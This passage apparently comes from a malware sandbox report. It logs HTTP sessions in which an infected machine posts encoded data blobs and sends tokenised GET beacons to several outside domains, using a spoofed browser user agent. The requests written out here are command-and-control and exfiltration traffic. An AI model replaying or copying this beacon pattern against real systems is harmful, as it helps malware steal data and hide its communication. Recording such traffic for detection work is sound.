mRu=389inJRufg4iYCIoU5Ww1VCVx861/dVQpPMvkN+tmoknm18NmBPnItzjQ0o0skEdTBqYGlxvQot+foO90Ani8259cvUv2yg0sjXOTU8maDVY1/9uZMGugYjY6xZfEcc9fChh4euAf2AXtNH0TzSZvE11IKTodKZfg4qENRoTW+qo2cD9d2Mab+9W1vQFzI1CizT66IIxIIgS/fcesWmfiy4=

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.11.20	49791	84.32.84.32	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:34:16.115364075 CET	2578	OUT	POST /h7d8/ HTTP/1.1 Host: www.pg874.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.pg874.shop Referer: http://www.pg874.shop/h7d8/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 33 38 39 69 6e 4a 52 75 66 67 34 69 59 43 49 6f 55 35 57 77 31 56 43 56 78 38 36 31 2f 64 56 51 70 50 4d 76 6b 4e 2b 74 6d 6f 73 6e 6d 48 45 4e 6e 67 50 6e 4a 74 7a 6a 54 30 6f 31 73 6b 45 55 54 42 69 63 47 6c 31 5a 51 74 68 2b 5a 2b 61 39 7a 31 54 69 79 32 35 39 65 76 55 71 6f 43 68 32 73 6e 4c 30 54 55 73 6d 61 44 56 59 31 36 35 75 4f 4e 47 75 69 59 6a 58 39 78 5a 74 56 4d 63 46 66 47 31 58 34 66 2b 2b 65 46 49 58 74 74 33 30 51 42 4b 5a 6a 45 31 72 4e 4b 54 77 64 4b 56 63 67 34 66 39 4e 51 63 35 57 35 32 6f 30 61 69 44 47 48 70 4d 5a 74 5a 6a 77 2f 45 49 7a 4c 74 74 39 44 37 65 2b 35 34 2b 4d 73 4a 43 34 4e 59 4c 7a 58 6a 41 34 56 55 50 66 55 33 6b 6d 4a 39 7a 66 2b 4a 30 36 66 39 64 32 56 66 39 47 4c 79 7a 57 36 51 66 46 46 77 64 43 63 46 72 79 53 65 4b 6f 63 69 74 45 59 69 46 55 49 72 62 73 47 43 39 68 56 52 59 56 55 36 4f 39 54 6b 64 65 6d 73 49 73 4f 6c 4b 2b 4a 6e 50 6c 62 46 31 74 71 41 2b 4f 71 4b 38 5a 38 52 69 38 4b 71 6a 53 53 2f 66 50 33 35 32 7a 36 6f 68 54 42 31 47 68 4c [TRUNCATED] Data Ascii: mRu=389inJRufg4iYCIoU5Ww1VCVx861/dVQpPMvkN+tmosnmHENngPnJtzjT0o1skEUTBicGl1ZQth+Z+a9z1Tiy259evUqoCh2snL0TUsmaDVY165uONGuiYjX9xZtVMcFfG1X4f++eFIXtt30QBKZjE1rNKTwdKVcg4f9NQc5W52o0aiDGHpMZtZjw/EIzLtt9D7e+54+MsJC4NYLzXjA4VUPfU3kmJ9zf+J06f9d2Vf9GLyzW6QfFFwdCcFrySeKocitEYiFUIrbsGC9hVRYVU6O9TkdemsIsOlK+JnPlbF1tqA+OqK8Z8Ri8KqjSS/fP352z6ohTB1GhLNariG0KPE6Rm4rPH1s7060XfoXFFYStQLSIeAf8e0iq+kGo90U9ZSAOV9npDQDf/LwJGGujPNu53z4gkOWTURWGo5FBG0j6ug//AyvPoxPa40pSCTxh/Rlot7pshi9TJ7Vj44I7RhlGvbYnXvHWYPbULiSEPw5VbAkuiXdI/lw6rTsIGekKfPKZAHi9yRLjhSHTimVZV6Apki2R21hjoVdUveNAXRVFPtPVp57ilUasOOW0eP/eKdzvB6w+dh664T7jg/abJpTTg5Uzxr08vfVwXPREBzfWATAhtcYWUaWOBlshjMyikdQ2XWJQnR06aFGycjBu32lRuqAaaKKvUZRsmnva3jarqkvA1yFzTJdP9aV9RclWnKrCZuDTqFZOnUBzQS+PnwSk4wpQdLMyCgaQJDyPKbUs/mny78AhF4GxdRwbRFuZR0w7v0b/8jwcOGoNEWhD/hzJEQN8tKZ55zPvcYGnUCAemCzj6suFg7CUkpMZY6BKmP/PVeZomzIjfepJAX9xFQ2VqTYi/PZYaDGQQaM+uo9bdeAz01NOv1X4JwJUqoPP6XWzF1G/AUNEOfvrh+i9ouQ/kOm7AnJ8e+orOZO4oR/cY1aDSQEWlYWaTP7vNsV2VUOS5XGMC3zaYQlQdg0VDiTtbJ6U98dQaFd9XiYDY18j+d3 [TRUNCATED]
Nov 12, 2024 15:34:16.115469933 CET	5332	OUT	Data Raw: 4c 4d 2f 36 6e 4c 63 76 2f 32 55 4b 2f 43 7a 46 51 4e 43 6c 64 2b 68 49 6c 77 62 53 47 54 4c 4a 71 76 41 64 42 30 6f 46 6d 2f 37 34 4f 73 36 42 64 4c 51 73 76 5a 6b 68 44 31 74 58 2b 65 41 31 64 53 52 5a 53 36 65 4d 72 5a 55 34 2f 30 6e 68 66 79 Data Ascii: LM/6nLcv/2UK/CzFQNCld+hIlwbSGTLJqvAdB0oFm/74Os6BdLQsvZkhD1tX+eA1dSRZS6eMrZU4/0nhfyOfjtxIepzDcpSsXuj6VAyan23f9ieKNcYONgL8oCy5RIQRroWQB7x7A78cHpUT66FtxZ4UMi6LZ/INMFrj9M1f8mKBTkyalR603nbDgDJk9cMVf+VfVzGee3+v9BzqhfE7ywPBvsd+joEkn4P2/Xth9sd4QaOZTUy

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.11.20	49792	84.32.84.32	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:34:18.895777941 CET	473	OUT	GET /h7d8/?mRu=6+VCk9pNPTQZYCZ6d4PN3EmbuLb87q5olpsVnOemsYlmrkAHkUX/D7H9eR5xtWpIZUSGBjAAXrZ9ZbWt4k2m/mELc90NwjhxnhDwTkUjNTY6s8tAYo2upp8=&UJ=7H1XM HTTP/1.1 Host: www.pg874.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:34:19.146723986 CET	1289	IN	HTTP/1.1 200 OK Server: hcdn Date: Tue, 12 Nov 2024 14:34:19 GMT Content-Type: text/html Content-Length: 9973 Connection: close Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 4947f39dd4c215a62359419fc0ddfea9-asc-edge5 Expires: Tue, 12 Nov 2024 14:34:18 GMT Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED] Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;m
Nov 12, 2024 15:34:19.146769047 CET	1289	IN	Data Raw: 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66 38 Data Ascii: argin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:60
Nov 12, 2024 15:34:19.146811008 CET	1289	IN	Data Raw: 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f Data Ascii: ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;lin
Nov 12, 2024 15:34:19.146855116 CET	1289	IN	Data Raw: 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 Data Ascii: ze:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:
Nov 12, 2024 15:34:19.146897078 CET	1289	IN	Data Raw: 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f Data Ascii: -graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/affiliates rel=nofollow><i aria-hidde
Nov 12, 2024 15:34:19.146939039 CET	1289	IN	Data Raw: 46 69 6e 64 20 79 6f 75 72 20 68 6f 73 74 69 6e 67 20 70 6c 61 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d Data Ascii: Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hosting</div><br><p>Add your website to any of your hosting plans. Follow the article
Nov 12, 2024 15:34:19.146984100 CET	1289	IN	Data Raw: 54 46 2d 31 36 20 76 61 6c 75 65 22 29 3b 36 35 35 33 35 3c 72 26 26 28 72 2d 3d 36 35 35 33 36 2c 65 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 72 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 29 2c 72 3d Data Ascii: TF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023\|55296)),r=56320\|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75*(o<26)-((0!=r)<<5)}function n(r,e,n){var t;
Nov 12, 2024 15:34:19.147027969 CET	1289	IN	Data Raw: 68 61 72 43 6f 64 65 41 74 28 30 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 75 74 66 31 36 2e 65 6e 63 6f 64 65 28 6d 29 7d 2c 74 68 69 73 2e 65 6e 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 61 29 7b 76 61 72 20 68 2c 66 2c 69 2c 63 2c 75 Data Ascii: harCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLowerCase())).length;if(a)for(d=0;d<v;d++)w[d]=t[d]!=w[d];var m,y=[];for(h=128,u=72,d=f

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.11.20	49793	208.91.197.27	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:34:24.307627916 CET	777	OUT	POST /xvf3/ HTTP/1.1 Host: www.rimberiokitchen.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.rimberiokitchen.online Referer: http://www.rimberiokitchen.online/xvf3/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 62 6e 70 76 35 75 6a 4a 32 33 42 41 4e 57 61 35 4e 37 51 69 59 73 4b 58 46 6b 79 67 75 77 65 44 64 6f 45 47 73 63 75 4a 59 64 5a 4f 5a 44 7a 65 67 41 46 52 46 6c 73 5a 43 6e 50 6e 65 44 37 54 75 37 4d 68 52 35 70 30 57 6b 47 6b 53 63 35 76 4f 59 68 5a 39 70 69 4f 61 54 4a 5a 49 4c 2f 79 49 67 69 4d 30 46 67 63 53 63 34 66 35 6a 48 54 2f 6c 76 41 6f 45 39 78 67 68 77 31 7a 53 6f 2f 49 34 55 54 4a 31 64 77 42 6e 33 72 4f 78 52 37 70 49 64 4b 4d 64 47 43 55 58 69 4e 45 5a 4f 6f 34 2f 72 4b 32 30 36 50 74 74 42 7a 73 63 78 38 74 6d 32 74 56 4f 38 69 37 69 32 37 49 67 65 45 41 67 3d 3d Data Ascii: mRu=bnpv5ujJ23BANWa5N7QiYsKXFkyguweDdoEGscuJYdZOZDzegAFRFlsZCnPneD7Tu7MhR5p0WkGkSc5vOYhZ9piOaTJZIL/yIgiM0FgcSc4f5jHT/lvAoE9xghw1zSo/I4UTJ1dwBn3rOxR7pIdKMdGCUXiNEZOo4/rK206PttBzscx8tm2tVO8i7i27IgeEAg==

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.11.20	49794	208.91.197.27	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:34:26.979526043 CET	797	OUT	POST /xvf3/ HTTP/1.1 Host: www.rimberiokitchen.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.rimberiokitchen.online Referer: http://www.rimberiokitchen.online/xvf3/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 62 6e 70 76 35 75 6a 4a 32 33 42 41 4c 48 71 35 64 6f 34 69 51 73 4b 59 4c 45 79 67 67 67 65 48 64 76 4d 47 73 64 36 5a 59 4f 39 4f 59 68 62 65 68 45 78 52 43 6c 73 5a 4b 48 50 2b 42 7a 37 59 75 37 51 54 52 39 70 30 57 6c 69 6b 53 64 4a 76 4f 72 4a 59 39 35 69 41 44 44 4a 62 4d 4c 2f 79 49 67 69 4d 30 47 63 32 53 63 67 66 2b 54 58 54 2f 42 62 42 69 6b 39 79 6f 42 77 31 6b 43 6f 37 49 34 55 68 4a 30 77 58 42 6b 50 72 4f 77 68 37 70 63 4a 46 58 74 47 45 51 58 69 5a 4e 39 44 50 6a 63 57 2f 77 7a 61 79 6e 4d 46 52 67 71 38 6d 77 55 43 4a 57 64 67 51 2f 53 50 54 4b 69 66 66 64 6f 72 34 7a 64 58 4e 4f 63 55 4b 42 6d 51 41 72 56 6b 46 4c 62 63 3d Data Ascii: mRu=bnpv5ujJ23BALHq5do4iQsKYLEygggeHdvMGsd6ZYO9OYhbehExRClsZKHP+Bz7Yu7QTR9p0WlikSdJvOrJY95iADDJbML/yIgiM0Gc2Scgf+TXT/BbBik9yoBw1kCo7I4UhJ0wXBkPrOwh7pcJFXtGEQXiZN9DPjcW/wzaynMFRgq8mwUCJWdgQ/SPTKiffdor4zdXNOcUKBmQArVkFLbc=

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.11.20	49795	208.91.197.27	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:34:29.658507109 CET	2440	OUT	POST /xvf3/ HTTP/1.1 Host: www.rimberiokitchen.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.rimberiokitchen.online Referer: http://www.rimberiokitchen.online/xvf3/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 62 6e 70 76 35 75 6a 4a 32 33 42 41 4c 48 71 35 64 6f 34 69 51 73 4b 59 4c 45 79 67 67 67 65 48 64 76 4d 47 73 64 36 5a 59 4f 31 4f 59 53 6a 65 67 6a 74 52 44 6c 73 5a 56 33 50 6a 42 7a 37 46 75 37 59 58 52 39 74 43 57 6d 4b 6b 51 2f 42 76 48 2b 39 59 33 35 69 41 4c 6a 4a 61 49 4c 2b 36 49 6a 4b 32 30 47 4d 32 53 63 67 66 2b 56 54 54 35 56 76 42 78 30 39 78 67 68 77 35 7a 53 6f 54 49 34 4d 78 4a 30 31 67 43 56 76 72 4e 51 78 37 71 70 64 46 4b 64 47 47 63 33 6a 65 4e 36 4c 51 6a 63 4c 47 77 7a 48 58 6e 50 56 52 78 73 39 35 74 6d 57 78 44 64 63 54 6a 44 6e 34 42 42 54 52 59 76 7a 61 79 37 54 4b 4a 72 34 4b 42 47 6f 74 7a 6c 4d 57 63 64 54 63 36 75 46 2f 31 64 67 32 74 37 52 32 39 59 78 6f 6e 66 70 67 6c 70 2f 32 49 62 48 53 6f 48 53 78 32 41 2b 41 4a 4f 35 6d 34 35 55 4f 4c 2f 6d 70 71 30 50 66 55 4a 4d 42 5a 56 65 2f 41 65 6b 42 32 69 66 6b 79 70 43 32 6f 66 58 42 6f 48 62 53 7a 4b 56 70 37 36 42 37 5a 36 50 36 50 30 71 66 66 65 49 4c 39 6b 4d 63 32 6d 49 55 6c 4f 6b 42 43 48 59 64 76 38 [TRUNCATED] Data Ascii: mRu=bnpv5ujJ23BALHq5do4iQsKYLEygggeHdvMGsd6ZYO1OYSjegjtRDlsZV3PjBz7Fu7YXR9tCWmKkQ/BvH+9Y35iALjJaIL+6IjK20GM2Scgf+VTT5VvBx09xghw5zSoTI4MxJ01gCVvrNQx7qpdFKdGGc3jeN6LQjcLGwzHXnPVRxs95tmWxDdcTjDn4BBTRYvzay7TKJr4KBGotzlMWcdTc6uF/1dg2t7R29Yxonfpglp/2IbHSoHSx2A+AJO5m45UOL/mpq0PfUJMBZVe/AekB2ifkypC2ofXBoHbSzKVp76B7Z6P6P0qffeIL9kMc2mIUlOkBCHYdv8w7/y5cBMh5i4ISDdQjFFXSkCnhopHG0p0kOjVWCJHC6NyH2+N3LLgBrYabHNOs0Lawm2oC71aMb9wvxLv9ItTmRuom+Zri9nqIBO/A1rpm3vL0nU1aBUMBDAiGCgCIO2jx1IGffpmP4XVS/ymV+8H+YNQMpIh3Z252em5z8Nf3scyOvS9bCgCHiIiVzz1fpb6siRW+IlB+05dj5GbsDc5g9LJjq4mjDDOCrWxcvnZAfXnH+PqWffe0gdkjCvEaxErgyzJHUEkY9HE9Fp55alL4CyYNVJ/CUOpHA13Hfd3/HujN6CowDtj0+Pa4NVS8Emt5siPbVqwJlqwsqLDa25vSkAchwbDF8z0s1xup4u30ynY+qXV/kJSQC+EuaLBTWUW27SrnH1exjhV7tkpNmBH+hiUTismo1vCb0ZGyigRQ/NvgKkosiEgnS/FnStBYXaSrOm22h0vjM7R1t1iLjck6NGPJ6Ax6Z8uFvyaNe/iIxNQ47NuLh6UA0xlhJmpkVDk9CU9Nm6Ba9k/AvuC7guSLosD0aACF7nOuUo0Rdyqiq+Y1wtHEwRy8sfbk1+RCLcCn+DLZDcx4EycGwE6ygq3KrDhL4Ma1VftSjcXiDKXn5u0S3sT8inpyXauTcmFzU9JXmgqsMx5gsY+3ONgkTW7kzhd0YyCftYTp [TRUNCATED]
Nov 12, 2024 15:34:29.658535957 CET	5506	OUT	Data Raw: 63 59 6e 41 6d 69 4b 38 7a 6d 39 68 62 51 4b 74 36 75 75 4e 72 43 71 41 75 41 48 78 38 77 43 72 48 2f 52 2b 4b 62 70 64 68 54 38 67 42 64 34 54 6c 4e 51 52 6e 7a 4c 6a 49 64 67 32 50 37 6b 6e 37 70 4e 53 72 69 6c 43 78 39 68 69 58 68 2b 63 70 64 Data Ascii: cYnAmiK8zm9hbQKt6uuNrCqAuAHx8wCrH/R+KbpdhT8gBd4TlNQRnzLjIdg2P7kn7pNSrilCx9hiXh+cpdBGEdl7QrUQvUW+BqKQAlS1cRm2anxGNjzXawhPNWvRZ45H5lFAtKrFMh/cLdUt4J6YYQK9aZuQ5XXl67TxuSHc2mBfmgYviTlUbLf0Q5oQSHolhTyd3p8cQmkwzH2yzSeA3Gb9PFQMX/IVHl0Zh2wGeuRJon+Jf4k

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.11.20	49796	208.91.197.27	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:34:32.334269047 CET	485	OUT	GET /xvf3/?mRu=WlBP6ZDj33sme071J7YmRt2meznD9lOMeO4smNCsOshEYDb+rkIOBjcGODqfewmlgMUUULEtW3alEv1cIqlE3oXaOj92B6nyIwOIgW4/F45i+leDgRmHhUA=&UJ=7H1XM HTTP/1.1 Host: www.rimberiokitchen.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:34:32.753819942 CET	995	IN	HTTP/1.1 200 OK Date: Tue, 12 Nov 2024 14:34:32 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") Set-Cookie: vsid=907vr4789676725425560; expires=Sun, 11-Nov-2029 14:34:32 GMT; Max-Age=157680000; path=/; domain=www.rimberiokitchen.online; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_G9wrI8ErGCovIRiUwqpM3lqcVFgMFwvVC+ri2ftv8jyMhilLZEAxv+j+LXbUBYs/7SpZSgQzMtth1xjBKIOL2g== Content-Length: 2650 Content-Type: text/html; charset=UTF-8 Connection: close
Nov 12, 2024 15:34:32.753840923 CET	188	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_G9wrI8ErGCovIRiUwqp
Nov 12, 2024 15:34:32.753850937 CET	1220	IN	Data Raw: 4d 33 6c 71 63 56 46 67 4d 46 77 76 56 43 2b 72 69 32 66 74 76 38 6a 79 4d 68 69 6c 4c 5a 45 41 78 76 2b 6a 2b 4c 58 62 55 42 59 73 2f 37 53 70 5a 53 67 51 7a 4d 74 74 68 31 78 6a 42 4b 49 4f 4c 32 67 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c Data Ascii: M3lqcVFgMFwvVC+ri2ftv8jyMhilLZEAxv+j+LXbUBYs/7SpZSgQzMtth1xjBKIOL2g=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.rimberiokitchen.online/px.js?ch=1"></script><script type="text/java
Nov 12, 2024 15:34:32.753956079 CET	1220	IN	Data Raw: 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2f 2a 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 20 20 20 20 7d 2a 2f 0d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d Data Ascii: } /body { overflow:hidden; }/ </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> <!
Nov 12, 2024 15:34:32.753968000 CET	22	IN	Data Raw: 3e 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: ></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.11.20	49797	203.161.49.193	80

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:34:37.944828033 CET	762	OUT	POST /cadc/ HTTP/1.1 Host: www.futurevision.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.futurevision.life Referer: http://www.futurevision.life/cadc/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 2f 64 5a 67 7a 32 48 49 68 5a 46 78 64 6b 70 31 48 34 74 50 75 33 59 45 4c 65 50 30 6d 33 55 46 33 71 62 53 6a 4e 57 6e 59 39 4c 39 44 44 70 58 32 6f 64 41 6f 4a 78 73 79 63 79 55 68 52 7a 63 36 68 46 4d 61 37 58 71 47 47 36 68 41 48 6c 49 6d 49 71 65 62 52 6d 62 4b 6b 77 46 75 6c 50 69 46 57 57 35 30 7a 68 62 78 58 49 63 4e 58 2b 50 75 34 48 61 45 6b 5a 32 4f 2b 37 76 50 65 6f 59 50 46 59 